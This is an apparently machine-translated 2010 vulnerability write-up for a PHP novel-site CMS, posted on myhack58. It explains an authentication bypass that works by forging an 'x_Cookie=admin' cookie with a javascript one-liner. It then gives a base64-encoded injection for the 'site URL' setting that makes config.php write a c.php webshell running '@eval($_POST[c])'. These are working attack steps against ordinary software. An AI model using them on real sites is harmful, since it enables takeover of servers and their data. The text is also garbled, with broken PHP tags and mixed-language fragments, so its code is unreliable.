Cold di novel program of tasteless vulnerability-vulnerability warning-the black bar safety net

2010-02-03T00:00:00
ID MYHACK58:62201026133
Type myhack58
Reporter 佚名
Modified 2010-02-03T00:00:00

Description

Just on chinaz visiting when found this system download the amount of near-3w, back to read the next code, found tasteless vulnerability A, The following analysis:

看 到 后台 登陆 页面 /admin/login.php <?

include(’data.php’);

if($_POST[’password’]==$password & $_POST[’adminname’]==$adminname){

setcookie("x_Cookie", $adminname);

echo"<script>location. href=’admin.php’;</script>";

exit;

}else{

echo"<script>alert(’username or password error!!!’); location. href=’index.php’;</script>";

}

?& gt; Copy the code where the variable$password, $adminname in the data. php declares that: <?

$adminname="admin";

$password="admin";

?& gt; Copy the code in to see him the verification code: <?

include(’data.php’);

if($_COOKIE[’x_Cookie’] ==$adminname){

echo"<script>location. href=’admin.php’;</script>";

exit;

}

?& gt; Copy the code here simply determines the username, and the username from the cookie, as long as the admin username not modified tasteless here,but many administrators didn't change the user name, including official, the You can use cookies to deceive into the background. exp: the javascript:alert(document. cookie="x_Cookie=admin");location. href=’/admin/admin.php’; Copy the code background get the webshell is still relatively simple, see the background of the admin_man. php file for basic system parameters code: <?

}elseif ($id==’save’){

if(function_exists("curl_init")){$isfun="curl";}

elseif(function_exists("fopen")){$isfun="fopen";}

$link = str_replace("\r\n",";",$_POST[’link’]);

$con=’<’."\ r\n".’$ fromurl = base64_decode(\’aHR0cDovL3d3dy5xaWFuemFpLmNvbS8=\’);’."\ r\n".’$ sitename=’.’"’.$ _POST[’sitename’].’"’.";\ r\n".’$ isfun=’.’"’.$ isfun.’"’.";\ r\n".’$ flush=’.$ _POST[’flush’].";\ r\n".’$ reurl=’.’"’.$ _POST[’reurl’].’"’.";\ r\n".’$ html=’.’"’.$ _POST[’html’].’"’.";\ r\n".’$ keywords=’.’"’.$ _POST[’keywords’].’"’.";\ r\n".’$ email=’.’"’.$ _POST[’email’].’"’.";\ r\n".’$ siteurl=’.’"’.$ _POST[’siteurl’].’"’.";\ r\n".’$ link=’.’\’.$ link.’\’.";\ r\n".’$ tongji=’.’\’. stripslashes($_POST[’tongji’]).’\’.";\ r\n?& gt;";

$fp=fopen("../config.php","w");

fwrite($fp,$con);

fclose($fp);

echo"<script>alert(’modify success!’); location. href=’? id=man’;</script>";

exit;

}

?& gt; Copy the code using php double quotes in the properties, in the background the“basic system parameters”in the “site URL:”write ${${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgpz4x))}} 复制 代码 保存 后 访问 /config.php 就 会 在 根 目录 下 生成 c.php that code is<? php @eval($_POST[c]); ?& gt;1

Vulnerability is relatively simple tasteless,large 犇 Mo laugh